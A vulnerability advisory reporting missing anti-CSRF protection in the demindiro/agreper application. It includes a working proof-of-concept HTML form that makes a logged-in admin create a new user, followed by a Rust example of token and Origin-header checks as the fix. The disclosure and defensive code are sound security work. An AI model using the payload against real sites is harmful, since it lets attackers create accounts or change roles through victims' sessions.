Anti-CSRF mechanism is not present in demindiro/agreper
Jan 24th 2023
The application is vulnerable to a CSRF attack.
Proof of Concept
- Login as admin.
- Open the following HTML file in the browser. This action is equivalent to clicking a link sent by an attacker.
    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
        <script>history.pushState('', '', '/')</script>
        <form action="http://localhost:8000/admin/user/new/" method="POST">
          <input type="hidden" name="name" value="csrf" />
          <input type="hidden" name="password" value="password" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
- Click the button.
- A new user is created.
This vulnerability allows an attacker to force a logged-in admin to perform administrative actions such as:
- Creating a new user
- Changing a user's role
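The standard fix for this class of issue is the synchronizer token pattern: every state-changing form carries a hidden per-session token that the handler compares against the copy stored server-side, with an Origin header check as a second layer. The following is an added example written for this report, not code from the agreper project; it uses only the Rust standard library, and the field name `csrf_token`, the session token value and the expected origin `http://localhost:8000` are assumptions chosen to match the PoC above.

```rust
use std::collections::HashMap;

/// Why a state-changing request was rejected.
#[derive(Debug, PartialEq)]
pub enum CsrfError {
    BadOrigin,
    MissingToken,
    TokenMismatch,
}

/// Minimal percent-decoder for application/x-www-form-urlencoded values
/// ('+' becomes space, %XX becomes the byte XX).
fn percent_decode(s: &str) -> String {
    let bytes = s.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        match bytes[i] {
            b'+' => {
                out.push(b' ');
                i += 1;
            }
            b'%' if i + 2 < bytes.len() => {
                let decoded = std::str::from_utf8(&bytes[i + 1..i + 3])
                    .ok()
                    .and_then(|h| u8::from_str_radix(h, 16).ok());
                match decoded {
                    Some(v) => {
                        out.push(v);
                        i += 3;
                    }
                    None => {
                        out.push(b'%');
                        i += 1;
                    }
                }
            }
            b => {
                out.push(b);
                i += 1;
            }
        }
    }
    String::from_utf8_lossy(&out).into_owned()
}

/// Parse a form body such as "name=csrf&password=password" into a map.
pub fn parse_form(body: &str) -> HashMap<String, String> {
    body.split('&')
        .filter(|pair| !pair.is_empty())
        .map(|pair| {
            let (k, v) = pair.split_once('=').unwrap_or((pair, ""));
            (percent_decode(k), percent_decode(v))
        })
        .collect()
}

/// Constant-time comparison so the token check does not leak timing.
pub fn ct_eq(a: &[u8], b: &[u8]) -> bool {
    if a.len() != b.len() {
        return false;
    }
    let mut diff = 0u8;
    for (x, y) in a.iter().zip(b) {
        diff |= x ^ y;
    }
    diff == 0
}

/// Check a POST before performing an admin action.
/// `session_token` is the random per-session secret stored server-side and
/// embedded as a hidden `csrf_token` field in every legitimate form
/// (hypothetical field name, not taken from the project).
pub fn check_csrf(
    expected_origin: &str,
    origin_header: Option<&str>,
    session_token: &str,
    body: &str,
) -> Result<(), CsrfError> {
    // Layer 1: browsers send Origin on cross-site POSTs; an attacker's page
    // cannot forge it, so a mismatch means the form did not come from us.
    if let Some(origin) = origin_header {
        if origin != expected_origin {
            return Err(CsrfError::BadOrigin);
        }
    }
    // Layer 2: the form must carry the session's token. The PoC form above
    // cannot know it, so the request fails here even without an Origin header.
    let form = parse_form(body);
    let submitted = form.get("csrf_token").ok_or(CsrfError::MissingToken)?;
    if !ct_eq(submitted.as_bytes(), session_token.as_bytes()) {
        return Err(CsrfError::TokenMismatch);
    }
    Ok(())
}

fn main() {
    // Constructed sample: the PoC's body, sent from an attacker-controlled origin.
    let token = "a1b2c3d4"; // assumed per-session secret
    let poc_body = "name=csrf&password=password";
    println!("{:?}", check_csrf("http://localhost:8000", Some("http://attacker.example"), token, poc_body));
    println!("{:?}", check_csrf("http://localhost:8000", None, token, poc_body));
    let legit = "name=csrf&password=password&csrf_token=a1b2c3d4";
    println!("{:?}", check_csrf("http://localhost:8000", Some("http://localhost:8000"), token, legit));
}
```

The Origin check alone is not sufficient (some clients omit the header, which is why the code only rejects on a mismatch rather than on absence), and the token alone is sufficient in principle; using both gives defence in depth at negligible cost. The token must be generated from a cryptographically secure random source and regenerated on login.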